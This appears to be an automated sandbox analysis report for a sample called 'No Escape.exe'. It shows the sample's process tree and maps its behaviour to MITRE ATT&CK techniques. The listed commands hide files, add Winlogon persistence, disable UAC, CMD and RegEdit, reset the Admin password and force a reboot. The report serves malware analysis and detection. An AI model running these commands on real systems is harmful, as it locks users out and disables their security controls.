- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=7164,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=6908 /prefetch:1
  2⤵
  PID:1540
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=3244,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2972 /prefetch:1
  2⤵
  PID:4788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=7152,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=7024 /prefetch:1
  2⤵
  PID:632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=3084,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=6424 /prefetch:1
  2⤵
  PID:3908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3256,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4516 /prefetch:8
  2⤵
  PID:3600
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=4568,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5572 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2516

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:5308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2560

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x394 0x498
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3804

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5940

C:\Users\Admin\AppData\Local\Temp\Temp1_NO-ESCAPE-main.zip\NO-ESCAPE-main\No Escape.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_NO-ESCAPE-main.zip\NO-ESCAPE-main\No Escape.exe"
1⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:996
- C:\Windows\system32\wscript.exe
  "C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\5F5C.tmp\5F5D.tmp\5F5E.vbs //Nologo
  2⤵
  - Checks computer location settings
  PID:3536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\hello.bat" "
    3⤵
    PID:852
  - - C:\Windows\system32\attrib.exe
      attrib +s +h C:\msg.exe
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2064
  - - C:\Windows\system32\attrib.exe
      attrib +s +h C:\launch.exe
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:4744
  - - C:\Windows\regedit.exe
      regedit /s hello.reg
      4⤵
      Runs .reg file with regedit
      PID:5240
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System /v DisableLogonBackgroundImage /t REG_DWORD /d 1
      4⤵
      PID:5360
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d C:\Windows\system32\userinit.exe,C:\launch.exe /f
      4⤵
      Modifies WinLogon for persistence
      PID:4680
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\control panel\desktop" /v wallpaper /t REG_SZ /d C:\hello.jpg /f
      4⤵
      Sets desktop wallpaper using registry
      PID:4944
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1
      4⤵
      PID:2468
  - - C:\Windows\system32\reg.exe
      reg ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      PID:3680
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2
      4⤵
      PID:3332
  - - C:\Windows\system32\reg.exe
      REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
      4⤵
      Disables RegEdit via registry modification
      Modifies registry key
      PID:4992
  - - C:\Windows\system32\net.exe
      net user Admin death
      4⤵
      PID:6092
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin death
        5⤵
        
        PID:3416
  - - C:\Windows\system32\shutdown.exe
      shutdown /t 0 /r
      4⤵
      PID:5560

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa38cd855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5428

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

System Information Discovery